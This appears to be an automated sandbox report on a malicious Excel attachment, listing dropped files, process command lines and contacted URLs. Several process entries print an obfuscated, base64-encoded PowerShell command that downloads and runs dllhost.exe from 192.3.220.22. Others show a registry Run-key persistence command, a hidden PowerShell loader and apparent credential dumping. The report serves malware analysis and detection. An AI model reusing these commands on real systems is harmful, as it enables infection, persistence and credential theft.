Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
PO 11001 .xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Sep 29 19:08:11 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res
|
ASCII text, with very long lines (3095), with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PO 11001 .xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C6F378.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF2F4046.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1p04mv1k.243.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESA499.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:31 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESF72C.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:53 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\afcoe331.g4g.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ambtf0up.cjv.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv38BD.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv6163.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv70BC.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv874A.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhvB54C.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhvF162.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bz5eavq5.fug.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\dalh1k2r.iv5.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jypyihgkg
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lpwdliyh.bjz.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ngs2zpei.e4g.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r24b1nro.hm0.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\rgnvwzkt.kw3.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\vtxzj5fd.fia.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\w3yxibzn.2ob.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wm0prvst.ulj.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wmp1pwio.ywf.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ywcv3dyy.x14.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zivderee.t2i.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zt2rhuiy.1xs.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF8616F0049FEDF9F2.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFA90634FEFD6052EC.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFDF9B9914A7405FA0.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LS6LA5XBHLPL7UUT4487.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YS2VA87AF2SC5704UN33.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF6b7df7.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\brkops.ind
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\dumrians.und
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Ukr.txt
|
ASCII text, with very long lines (359), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Valvulate.Cru
|
data
|
dropped
|
||
C:\Users\user\Desktop\54230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\54230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Windows\brandbombernes.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
There are 57 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs
-nOp -W 1 -c
DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
PoWeRSHElL -Ex BypaSs -nOp
-W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe
; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs
-nOp -W 1 -c
DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
PoWeRSHElL -Ex BypaSs -nOp
-W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe
; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
|
||
C:\Users\user\AppData\Roaming\dllhost.exe
|
"C:\Users\user\AppData\Roaming\dllhost.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ
/d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
($Frligheden)
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
($Frligheden)
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
|
||
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
|
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp"
"c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp"
"c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle
1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
|
There are 29 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://192.3.220.22/hFXELFSwRHRwqbE214.bin
|
192.3.220.22
|
||
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
|
192.3.220.22
|
||
http://192.3.220.22/430/dllhost.exe
|
192.3.220.22
|
||
https://og1.in/2Rxzb3yX
|
unknown
|
||
http://192.3.220.22/
|
unknown
|
||
https://og1.in/
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://og1.in/2Rxzb3Z
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://og1.in/2Rxzb3s
|
unknown
|
||
https://support.google.com/chrome/?p=plugin_flash
|
unknown
|
||
http://192.3.220.22/ic
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
